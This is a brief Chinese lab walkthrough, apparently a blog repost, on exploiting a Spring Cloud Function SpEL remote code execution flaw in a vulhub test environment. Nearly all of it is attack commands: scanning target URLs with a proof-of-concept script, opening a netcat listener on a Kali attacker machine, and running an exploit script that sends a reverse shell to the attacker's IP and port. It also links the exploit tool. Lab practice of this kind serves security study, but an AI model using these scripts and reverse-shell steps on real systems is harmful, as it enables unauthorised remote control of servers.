启动vulhub docker环境:
访问:http://192.168.29.130:8080/
Kali攻击机创建url.txt文件加入url
检测漏洞:利用工具POC进行探查是否存在SPEL漏洞
python Spel_RCE_POC.py url.txt
存在漏洞的url会显示到succ.txt中
反dshell工具:Kali机开启1207端口监听:
nc -lvp 1207
执行反dshell poc
python Spel_RCE_Bash_EXP.py http://192.168.29.130:8080/ 192.168.29.128 1207
成功获取到权限:
工具链接:https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)